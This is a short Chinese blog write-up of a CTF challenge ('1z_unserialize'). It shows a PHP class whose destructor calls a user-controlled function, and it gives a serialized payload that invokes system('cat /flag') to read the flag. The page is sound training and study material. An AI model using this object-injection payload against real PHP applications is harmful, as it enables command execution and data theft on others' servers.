首页 > 其他分享 >[SWPUCTF 2022 新生赛]1z_unserialize

[SWPUCTF 2022 新生赛]1z_unserialize

时间:2024-10-15 19:51:28浏览次数:11  
标签:__ lly 1z system unserialize lt 2022 nss payload

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
     
     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);     //这里相当于(this->lt)(this->lly) 即lt(lly)。
     }
    
    
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
 
 
?> 

我们联想到命令执行函数,我们需要构造payload,如果能够把a换成system,lly换成cat,那么就可以进行命令注入。构造payload。

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt='system';
    public $lly='cat /flag';

}


$b=new lyh();
echo serialize($b);
?>

输入payload:nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

得到flag:NSSCTF{934dfc44-3e21-47d8-b350-d0c932ffeab9}

标签:__,lly,1z,system,unserialize,lt,2022,nss,payload
From: https://blog.csdn.net/2301_80871705/article/details/142962041

相关文章

  • 20222301 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容本次实验主要围绕渗透测试与远程执行控制展开,通过不同工具和技术手段实现了对目标主机的深入渗透与监控。实验内容可以概括为以下几个方面:1.远程Shell获取:实验首先通过`netcat`和`cron`定时任务,以及`socat`与Windows任务计划相结合的方式,实现了对目标主机的远程Shell......
  • jsp高校试卷印刷管理平台系统n081z
    jsp高校试卷印刷管理平台系统n081z本系统(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。系统程序文件列表项目功能教师,打印店,打印订单,订单通知技术要求:   开发语言:JSP前端使用:HTML5,CSS,JSP动态网页技术后端使用SpringB......
  • 2022 CCPC 威海站
    写在前面时间复杂度与数据范围的关系计算机1秒大约能执行5e8次计算,假设时间限制为1秒,时间复杂度和数据范围对应如下:O(n)的算法能解决的数据范围在n<=1e8O(nlogn) 的算法能解决的数据范围在n<=1e6O(n^2) 的算法能解决的数据范围在n<=5e3O(n^3) 的算法......
  • 20222316 2024-2025-1 《网络与系统攻防技术》实验一实验报告
    一、实验内容缓冲区溢出定义:缓冲区溢出是一种程序错误,在这种情况下,数据被写入到内存中的缓冲区时超过了该缓冲区所能容纳的最大容量。当超过缓冲区的边界时,额外的数据会溢出到相邻的内存位置中,覆盖掉其他数据或指令,导致程序行为异常或系统安全漏洞。缓冲区溢出的原因:编程......